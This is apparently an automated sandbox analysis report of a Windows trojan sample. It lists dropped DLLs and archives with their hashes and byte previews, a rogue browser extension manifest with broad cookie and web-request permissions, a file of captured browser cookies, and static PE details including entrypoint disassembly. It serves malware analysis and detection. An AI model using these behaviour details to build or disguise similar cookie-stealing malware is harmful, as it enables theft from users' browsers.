SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_user.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv743B.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1618257864703.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xceb20a5a, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.872567430864403
Encrypted:	false
SSDEEP:	12288:e74014aRkBt/6hghBohNhfrg7OSj2sjR6BTG75DNU7R2UpMbgVpJXky/7xLDhXh1:kJ+wPM7f2sbMjRDhOnX34fVccgeTaNX
MD5:	B12C2D6FDBF5C909F5ED29EBACA2B2A8
SHA1:	4D3F404A0058567333053D6BF394E2147BA6008A
SHA-256:	EF1756636E21F05C140D30FB22F9221185CC2E93D1433E1CD2E767A2D2419501
SHA-512:	CBA8AC58FD0CA7EDED87B18155202591F5BDF1FE819EC222FE0791F18FAEA463A2864CA09E6A198EF54FE5A3F9B57EA8C93345B2CC4BD2DF8EB9E4E4BD2F91DB
Malicious:	false
Preview:	..Z... .......Z........Ef..4...w.............................."....x{......x..h..............................W.4...w..............................................................................................[............B.................................................................................................................. ............y........................................................................................................................................................................................................................................w......y.s................w~.`'....x..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1618257874860 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1618257874860 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618257864703.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1618257864703.txt Download File
Process:	C:\Users\user\AppData\Roaming\1618257864703.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	24468
Entropy (8bit):	3.7166807617924777
Encrypted:	false
SSDEEP:	192:b3r3Ii3M35gYs3b370v323b3n3jLI67T3q5wW/j+es8JlkSWIF:bb/cJgYsLL0vmL3zLIUqmB8JlkSZF
MD5:	B1271FAFAB78B64C4A452B45C8EC36B8
SHA1:	7B6AB613FA6A9EF51D604611818C5F0EAC43CC74
SHA-256:	91FF08B58EC792C626C95667EC233C51B678C2848C601E1B3F86FD458F62E4A2
SHA-512:	AFE65F52D6D2B270D9EFC11137515D8916E6CFBE0BBC74175D3C7F86E38951112074E537E28C17565C33C0C955466DF374531EF66EA0DF8D2B49CEF10E6F3960
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.866429705903183
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File size:	4255416
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
SHA512:	5f787359fbc37d8bed92da38e80106cc257c2339488ca956759b33024aa61194bb87faa8db841ded486d5bba253ce44342dd206cf93a9751de95784f5ee79f05
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
File Content Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

File Icon


Icon Hash:	b595139bec4252a9

Static PE Info

General
Entrypoint:	0x403bc3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Dh
mov esi, edi
mov edx, edi
mov edx, dword ptr [edi]
mov eax, dword ptr [esi]
push eax
call edx
popad
push 00000003h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C6482h
mov eax, ebp
mov ebx, ecx
mov eax, ecx
mov eax, dword ptr [esi]
idiv eax
mov esp, ecx
add ebx, eax
mov esp, esi
popad
mov eax, 00403F45h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Fh
pop edx
mov ecx, esi
mov edx, edi
mov ecx, dword ptr [ebp+00h]
mov esp, ebx
mov ebx, dword ptr [ebx]
pop ecx
popad
push eax
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Eh
mov ebp, esi
mov ebx, dword ptr [esi]
inc edx
mov ebx, esp
imul eax, edx
mov ecx, eax
popad
push 000013C5h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C6482h
mov edi, eax
dec edx
mov ebx, esi
call edi
mov edi, ecx
dec ebx
push ebx
test eax, eax
call edi
pop ecx
popad
push 00404779h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8f0	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc0540	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd2000	0x1eb8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x1c4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9276	0xa000	False	0.55888671875	data	6.56023629969	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x12dc	0x2000	False	0.28466796875	data	3.67874100082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x4ea4	0x4000	False	0.1611328125	data	1.88336858311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc0540	0xc1000	False	0.292934595612	data	5.9441633332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x121e0	0xbf518	data	French	France
RT_ICON	0xd16f8	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576	French	France
RT_MENU	0xd19e0	0x3d4	data	French	France
RT_GROUP_ICON	0xd1db8	0x14	data	French	France
